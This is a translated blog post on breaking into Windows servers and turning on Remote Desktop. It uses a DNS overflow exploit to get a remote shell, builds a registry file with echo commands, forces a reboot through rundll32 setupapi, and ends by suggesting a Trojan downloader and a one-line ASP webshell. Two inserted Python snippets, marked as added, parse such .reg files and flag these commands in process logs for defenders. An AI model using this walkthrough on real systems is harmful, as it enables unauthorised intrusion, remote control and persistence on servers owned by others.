Port 3389 (Remote Desktop) penetration under Windows

1. Win7, Win2003 and XP systems

To open port 3389 from the CMD command line:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

To close port 3389 from the CMD command line (changing 11111111 back to 00000000 reopens it):

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

2. Windows 2000 systems

A brief note on how the DNS overflow attack works. The overflow exploit program I use is dns.exe; running it in CMD shows its usage and parameters. First run "dns -s IP" to detect whether the target IP has the DNS overflow vulnerability. If it does, run "dns -t 2000all IP 1207" to carry out the overflow attack; it reports that a shell has been returned on port 1100, and "telnet IP 1100" then successfully obtains the returned cmdshell. Note that the current directory is C:\WINNT\system32. What we need to do next is use the "echo" command to write a registry file, 3389.reg. Copy the following lines into the cmdshell window one at a time and press Enter after each:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg

Briefly: the ">" symbol overwrites a file (the file is created if it does not exist, and any existing content is replaced), while ">>" appends, writing the new content after the file's existing content. The lines above are what gets written to 3389.reg. Note the second line: its role is to write one blank line, because the .reg file format requires it. Once the file has been written successfully, import it with "regedit /s 3389.reg"; the registry file is then imported into the registry. Be careful not to mistype a single character in the cmdshell, or the import will not work; it is best to prepare the lines in Notepad and paste them into the cmdshell window so they run correctly. You can then restart the target host with the following method. Execute the following in the cmdshell:
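As an added example (not from the original post), here is a small Python parser for .reg files like the 3389.reg built above: it enforces the header and blank-line rules just described and summarises what importing the file would do to Remote Desktop, which is useful for a defender who finds such a file on a host. It assumes backslash registry paths and the value semantics used on this page (fDenyTSConnections 0 = allow, TSEnabled 1 = on, PortNumber 0xD3D = 3389); the sample file is constructed.

```python
# Added example (not from the original post): parse a .reg file of the kind the echo
# commands above build, enforce the two format rules just described (version header,
# blank line after it) and report what importing it would do to Remote Desktop.
import re
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
PORT_KEYS = (TS_KEY + r"\Wds\rdpwd\Tds\tcp", TS_KEY + r"\WinStations\RDP-Tcp")
VALUE_RE = re.compile(r'"([^"]+)"=(?:dword:([0-9A-Fa-f]{8})|"(.*)")$')

def parse_reg(text):
    """Return {key: {name: value}}; dword data become int, string data stay str."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "Windows Registry Editor Version 5.00":
        raise ValueError("missing 'Windows Registry Editor Version 5.00' header")
    if len(lines) < 2 or lines[1].strip():
        raise ValueError("regedit needs a blank line after the header")
    result, key = {}, None
    for ln in (raw.strip() for raw in lines[2:]):
        if not ln:
            continue
        if ln.startswith("[") and ln.endswith("]"):   # [KEY] section header
            key = ln[1:-1]
            result.setdefault(key, {})
            continue
        m = VALUE_RE.match(ln)
        if m is None or key is None:
            raise ValueError("unparseable line: " + ln)
        name, dword, string = m.groups()
        result[key][name] = int(dword, 16) if dword is not None else string
    return result

def rdp_effect(reg):
    """enabled: True/False, or None if the file leaves the RDP switch alone; ports: ints."""
    ts = reg.get(TS_KEY, {})
    enabled = None
    if "fDenyTSConnections" in ts:   # 2003/XP/Win7 switch: 0 = allow, 1 = deny
        enabled = ts["fDenyTSConnections"] == 0
    if "TSEnabled" in ts:            # 2000 switch, set to 1 by the file above
        enabled = ts["TSEnabled"] == 1
    ports = sorted({reg[k]["PortNumber"] for k in PORT_KEYS if "PortNumber" in reg.get(k, {})})
    return {"enabled": enabled, "ports": ports}

# Constructed sample: the 2003 file from this page, with backslash registry paths.
SAMPLE_2003 = "\r\n".join([
    "Windows Registry Editor Version 5.00", "",
    "[" + TS_KEY + "]", '"fDenyTSConnections"=dword:00000000',
    "[" + PORT_KEYS[0] + "]", '"PortNumber"=dword:00000d3d',
    "[" + PORT_KEYS[1] + "]", '"PortNumber"=dword:00000d3d'])
```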

@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%\{out}.inf r

Copy the five lines above into the cmdshell one at a time, pressing Enter after each; once all five have been executed, the server will restart. Of course, there are other ways to make a server restart, such as terminating key system processes, and all of them can be simulated. If nothing goes wrong, wait for the server to reboot and then connect to the target: you will find that Remote Desktop Services has been opened successfully. At this point, opening Remote Desktop Services from the cmdshell returned by a Windows 2000 overflow is complete.

3. Windows 2003 systems

Compared with the 2000 system, opening Remote Desktop Services from a 2003 cmdshell is somewhat easier; at least no restart is needed! The first method is to write a 3389.reg file with the "echo" command and then import it with "regedit /s 3389.reg"; this is simple and similar to the method described above for 2000. Copy the following lines into the cmdshell window one at a time and press Enter after each:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg

After the above, run "regedit /s 3389.reg" to import the file and make it take effect. This method is relatively cumbersome, however. We can also use another, simpler way to open Remote Desktop Services. Before introducing it, let's get familiar with one of the most critical registry keys for Remote Desktop Services on the 2003 system:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server

Under it is a value named "fDenyTSConnections", whose data is either 1 or 0. A value of 1 means the Remote Desktop service is closed; a value of 0 means it is open. In other words, as long as we can change this critical registry value from the cmdshell, we achieve the goal of opening Remote Desktop Services! Fortunately, 2003 has a "reg" command that can do this. Here we take a 2003 server and obtain a cmdshell after an overflow by the same method described above. If you try to connect at this point, you will find that it is impossible to connect. The following explains in detail how to open Remote Desktop Services with the "reg" command. Execute:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

We find that the data of the "fDenyTSConnections" value is "0x1", which is the hexadecimal number 1. As mentioned above, this data means Remote Desktop Services is not open. What we have to do is change "0x1" to "0x0"! A direct "reg add" is not enough; you must delete the original value first and then add it! Execute in the cmdshell:

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

It asks whether you want to delete the registry value fDenyTSConnections; answer Yes, of course. Then execute:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

The prompt reports that the operation completed successfully. This sets "fDenyTSConnections" to "0x0", and we can run:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

We find that the data has been changed successfully. Now connect to the server on 3389 again: the connection succeeds, and you can create a user and play around. This concludes the method of opening Remote Desktop Services from a cmdshell on 2003.
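As an added example (not part of the original post), the following Python rules flag, in process-creation logs, the command lines used in sections 1 to 3 (reg add or delete of fDenyTSConnections, echo into a .reg file, regedit /s import, and the rundll32 setupapi reboot) so a defender can spot this activity after the fact. The log format (time, user and command line separated by tabs) and the sample events are constructed for the example.

```python
# Added example (not from the original post): flag process command lines that match the
# RDP-enabling and reboot commands described on this page. The log format is constructed:
# one event per line, "<time>\t<user>\t<command line>" (as exported from 4688/Sysmon events).
import re

# (rule name, pattern applied to the full command line)
RULES = [
    ("rdp-enable-reg-add", re.compile(
        r"\breg(?:\.exe)?\s+add\b.*fDenyTSConnections.*\s/d\s+0+\b", re.I)),
    ("rdp-deny-value-deleted", re.compile(
        r"\breg(?:\.exe)?\s+delete\b.*fDenyTSConnections", re.I)),
    ("rdp-reg-file-built", re.compile(
        r"\becho\b.*(?:Terminal Server|fDenyTSConnections|TSEnabled|TermService).*>>?\s*\S+\.reg", re.I)),
    ("reg-file-silent-import", re.compile(r"\bregedit(?:\.exe)?\s+/s\s+\S+\.reg", re.I)),
    ("reboot-via-setupapi-inf", re.compile(
        r"\brundll32(?:\.exe)?\s+setupapi\s*,\s*InstallHinfSection\b.*\.inf\b", re.I)),
]

def scan(log_text):
    """Return (time, user, rule) for every event whose command line matches a rule."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue   # malformed line: skip it rather than abort the whole scan
        time, user, cmd = parts
        for name, pat in RULES:
            if pat.search(cmd):
                hits.append((time, user, name))
    return hits

# Constructed sample events: two benign, four matching commands from this page.
SAMPLE_LOG = "\n".join([
    "2019-08-01T10:00:01\tSYSTEM\tC:\\WINNT\\system32\\svchost.exe -k netsvcs",
    "2019-08-01T10:02:13\tIUSR_WEB\tcmd.exe /c echo \"fDenyTSConnections\"=dword:00000000 >>3389.reg",
    "2019-08-01T10:02:20\tIUSR_WEB\tregedit /s 3389.reg",
    "2019-08-01T10:05:41\tIUSR_WEB\treg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0",
    "2019-08-01T10:06:02\tIUSR_WEB\trundll32 setupapi,InstallHinfSection DefaultInstall 1 C:\\WINNT\\Temp\\{out}.inf r",
    "2019-08-01T10:07:00\tadmin\treg query HKLM\\SOFTWARE\\Microsoft /v Version",
])
```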


After the overflow it is not strictly necessary to open Remote Desktop Services in the cmdshell.
You can echo a VBS file that downloads a remote-control Trojan, then run the Trojan from the cmdshell and connect to it.
You can also query whether the target IP has a website bound to it; if you find the site directory, echo a one-line Trojan into it (for example: echo "<% execute request("cmd") %>" > web path\test.asp), connect with the kitchen knife tool, then upload a full webshell, and then upload the 3389 tool again if required.

Source: www.cnblogs.com/RiwellAckerman/p/11286224.html